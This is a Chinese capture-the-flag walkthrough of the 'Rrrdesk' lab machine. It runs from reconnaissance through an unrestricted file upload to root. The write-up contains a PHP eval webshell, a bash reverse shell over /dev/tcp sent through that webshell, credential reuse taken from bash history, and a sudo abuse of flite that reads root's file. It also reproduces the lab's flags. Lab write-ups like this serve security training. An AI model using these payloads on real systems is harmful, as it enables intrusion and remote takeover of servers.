信息收集

cmd
┌──(root㉿kali)-[~]└─# arp-scan -l | grep PCS192.168.31.237  08:00:27:91:3c:4c       PCS Systemtechnik GmbH                                                                                                                            ┌──(root㉿kali)-[~]└─# IP=192.168.31.237
cmd
┌──(root㉿kali)-[~]└─# nmap -sV -sC -A $IP -PnStarting Nmap 7.95 ( https://nmap.org ) at 2025-08-11 10:04 EDTNmap scan report for Rrrdesk (192.168.31.237)Host is up (0.00060s latency).Not shown: 997 closed tcp ports (reset)PORT     STATE SERVICE       VERSION22/tcp   open  ssh           OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)| ssh-hostkey: |   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)80/tcp   open  http          Apache httpd 2.4.62 ((Debian))|_http-server-header: Apache/2.4.62 (Debian)|_http-title: \xE6\x96\x87\xE4\xBB\xB6\xE4\xB8\x8A\xE4\xBC\xA0\xE9\x9D\xB6\xE6\x9C\xBA3389/tcp open  ms-wbt-server Microsoft Terminal ServiceMAC Address: 08:00:27:91:3C:4C (PCS Systemtechnik/Oracle VirtualBox virtual NIC)Device type: general purpose|routerRunning: Linux 4.X|5.X, MikroTik RouterOS 7.XOS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)Network Distance: 1 hopService Info: OSs: Linux, Windows; CPE: cpe:/o:linux:linux_kernel, cpe:/o:microsoft:windows TRACEROUTEHOP RTT     ADDRESS1   0.61 ms Rrrdesk (192.168.31.237) OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

目录扫描

cmd
┌──(root㉿kali)-[~]└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.31.237[+] Method:                  GET[+] Threads:                 10[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.6[+] Extensions:              txt,html,bk,zip,tar,php,php3,bak,gz,shtml[+] Timeout:                 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/.php                 (Status: 403) [Size: 279]/index.php            (Status: 200) [Size: 14529]/.html                (Status: 403) [Size: 279]/uploads              (Status: 301) [Size: 318] [--> http://192.168.31.237/uploads/]/upload.php           (Status: 302) [Size: 0] [--> index.php]/back.zip             (Status: 200) [Size: 911]/.html                (Status: 403) [Size: 279]/.php                 (Status: 403) [Size: 279]/server-status        (Status: 403) [Size: 279]Progress: 2426160 / 2426171 (100.00%)===============================================================Finished===============================================================

扫出来 /back.zip ,把这个压缩包下载下来发现里面有 index.phpupload.php

index.php

php
<!DOCTYPE html><html><head>    <title>文件上传靶机</title></head><body>    <h2>任意文件上传</h2>    <form action="upload.php" method="POST" enctype="multipart/form-data">        <input type="file" name="file">        <input type="submit" value="上传">    </form>    <hr>    <h3>Welcome</h3></body></html>

upload.php

php
<?php$upload_dir = '/var/www/webdav/uploads/';$filename = $_FILES['file']['name'];$tmp_name = $_FILES['file']['tmp_name']; if (!empty($filename)) {    // 生成MD5文件名(保留原扩展名)    $file_ext = pathinfo($filename, PATHINFO_EXTENSION);    $new_name = md5(pathinfo($filename, PATHINFO_FILENAME)) . ($file_ext ? ".$file_ext" : '');        // 移动文件到上传目录    if (move_uploaded_file($tmp_name, $upload_dir . $new_name)) {        echo "Upload ok";    } else {        echo "文件上传失败!";    }} else {    header("Location: index.php");}?>

写个一句话木马放到 shell.php

php
<?php @eval($_GET['cmd']); ?>

然后算得字符串 shell 的 md5 值是 2591c98b70119fe624898b1e424b5e91

因此后门的链接就是 http://192.168.31.237/uploads/2591c98b70119fe624898b1e424b5e91.php

在 kali 上监听

cmd
nc -lnvp 4444

访问 http://192.168.31.237/uploads/2591c98b70119fe624898b1e424b5e91.php?cmd=system("bash -c 'bash -i >& /dev/tcp/kali的ip地址/4444 0>&1'"); 回到 kali 就会发现连上了

cat /home/lemon/user.txt 取得 flag

flag
flag{user-9ffbf43126e33be52cd2bf7e01d627f9}

提权

cmd
www-data@Rrrdesk:/home/welcome$ cat /home/lemon/.bash_historyexitflite -t 'welcome'exitls -alfind .ls -alss -lntupip aifconfigadecho speaker | md5sumls -alecho speaker | passwdidls -laexitsudo -lsudo geditsudo- lsudo -lsudo gedit /etc/passwdsudo -lsudo /usr/bin/geditsudo /usr/bin/gedit --display=:0sudo /usr/bin/gedit --display=:sudo /usr/bin/gedit --display=0sudo /usr/bin/gedit --display=

猜一下用户 lemon 的密码就是 speaker,结果就登进去了

登进去之后在终端跑 sudo -l 看看,发现 /usr/bin/flite 可以无密码运行 sudo

搜了下发现是这个开源的 tts 项目 festvox/flite: A small fast portable speech synthesis system

README 里面提到了:

text
Print sentences as they are said./bin/flite -pw doc/alice

因此运行 sudo /usr/bin/flite -pw /root/root.txt 就能看到 flag 了

PenTest_MazeSec_Rrrdesk-1